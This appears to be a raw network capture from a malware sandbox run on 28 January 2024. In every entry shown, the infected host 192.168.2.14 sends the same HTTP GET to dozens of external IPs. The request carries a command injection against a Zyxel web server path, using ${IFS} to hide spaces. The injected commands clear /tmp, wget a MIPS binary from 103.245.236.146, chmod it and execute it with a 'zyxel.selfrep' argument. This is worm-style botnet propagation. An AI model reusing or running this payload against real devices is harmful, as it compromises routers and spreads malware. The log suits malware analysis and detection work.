                                                        Jan 28, 2024 10:13:04.634457111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7464192.168.2.144936497.158.180.9443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.634486914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7465192.168.2.143318696.233.93.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.634516001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7466192.168.2.143677666.138.6.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.634546995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7467192.168.2.143676474.249.6.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.634586096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7468192.168.2.144073253.39.11.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.634617090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7469192.168.2.1451394138.178.169.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.634651899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7470192.168.2.1446144129.35.236.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.634686947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7471192.168.2.144045818.170.48.53443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.634721041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7472192.168.2.143429069.132.65.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.634763956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7473192.168.2.1442044105.78.131.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.634794950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7474192.168.2.145690841.153.176.56443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.634857893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7475192.168.2.1451730194.117.93.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.634893894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7476192.168.2.145760454.58.88.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.634917021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7477192.168.2.1454636186.193.246.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.634951115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7478192.168.2.1433146179.18.140.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.634998083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7479192.168.2.1448388169.170.53.50443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.635057926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7480192.168.2.143408662.87.63.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.635077000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7481192.168.2.1440668180.165.86.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.635113001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7482192.168.2.1460796161.104.125.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.635159969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7483192.168.2.1453536200.130.158.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.635201931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7484192.168.2.1450814148.183.250.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.635227919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7485192.168.2.145976818.191.202.11443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.635277987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7486192.168.2.1459380204.244.208.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.635307074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7487192.168.2.1441392126.68.93.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.635334969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7488192.168.2.1436084125.49.110.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.635379076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7489192.168.2.1453934141.199.237.201443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.635402918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7490192.168.2.143706092.46.166.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.635428905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7491192.168.2.144371290.229.14.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.635499001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7492192.168.2.1453910198.113.251.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.635515928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7493192.168.2.1448088175.5.255.91443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.635543108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7494192.168.2.1443406104.50.162.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.635579109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7495192.168.2.143428092.73.176.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.635601044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7496192.168.2.144058018.115.212.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.635634899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7497192.168.2.1450138138.177.48.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.635674953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7498192.168.2.1442476199.132.22.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.635715008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7499192.168.2.14552709.96.157.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.635742903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7500192.168.2.1436906123.9.182.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.635771990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7501192.168.2.1456806206.93.49.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.635829926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7502192.168.2.1455886188.24.186.58443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.635870934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7503192.168.2.1443160179.152.103.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.635905981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7504192.168.2.1451494223.40.187.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.635924101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7505192.168.2.145048244.26.37.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.635966063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7506192.168.2.1441214205.84.96.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.636008978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7507192.168.2.1439124168.185.171.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.636045933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7508192.168.2.145234668.1.245.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.636076927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7509192.168.2.14531465.207.48.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.647242069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7510192.168.2.1450200208.223.15.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.647277117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7511192.168.2.1438692171.230.136.162443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.647325039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7512192.168.2.145642091.198.87.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.647372961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7513192.168.2.144905690.119.141.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.647408009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7514192.168.2.143296487.241.43.73443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.647444010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7515192.168.2.14521161.155.43.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.647490978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7516192.168.2.1437820132.82.67.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.647516966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7517192.168.2.1458650194.121.240.230443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.647542000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7518192.168.2.145464242.216.100.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.647597075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7519192.168.2.144661683.123.99.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.647625923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7520192.168.2.1455484167.25.105.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.647669077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7521192.168.2.145146465.164.44.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.647726059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7522192.168.2.144895242.18.93.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.647764921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7523192.168.2.1442974115.216.188.1443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.647814989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7524192.168.2.144450038.106.161.34443
                                                        TimestampBytes transferredDirectionData
